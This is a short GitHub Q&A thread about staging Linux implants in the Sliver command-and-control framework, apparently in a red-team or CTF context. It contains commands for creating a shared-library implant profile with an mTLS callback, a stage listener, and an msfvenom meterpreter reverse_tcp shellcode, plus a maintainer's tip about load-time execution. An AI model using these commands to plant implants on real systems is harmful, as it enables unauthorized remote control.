### DISCUSSION TITLE
Linux Beacons and Sessions

### DISCUSSION THREAD

**Discussion by neontechtra** [BishopFox/sliver#1610] [Q&A] [answered]
I'm struggling to figure out how to get a linux machine into Sliver - I have attempted to read as much documentation as i can find, there are plenty of examples online for windows but for linux I cant seem to find anything.

What is the proper method :cry: 

Ive created a profile with the shared flag as that appears to be my only option?

`profiles new --arch amd64 --mtls tcp://192.168.x.x --os linux -f shared --skip-symbols linux-profile `

then i believe the next step is a stage listener?

`stage-listener --url tcp://192.168.x.x:8080 --prepend-size --profile linux-profile`

Then some msfcode (generate doesnt currently work it appears)

`msfvenom -p linux/x64/meterpreter/reverse_tcp lport=8080 lhost=tun0 -a x64 -f c  `

The c code i just wrapped in a shellcode runner i used to get a shell on a ctf box previously (catching it with msf)

but this doesnt work - im obviously doing something wrong and just want to figure out how to do this :sweat_smile: - Hopefully its ok to ask here. 

Best,

**Comment by rkervella** [comment, marked as answer]
Sliver Linux payloads are not compatible with msfvenom's stagers. You'll need to write your own stager for that. Also, if you want your shared library to trigger implant execution as soon as you `dlopen` it, you'll need to add the `--run-at-load` flag to your profile.

**Reply by neontechtra** [reply]
hmmm ok ... a googling I will go - tyvm :)
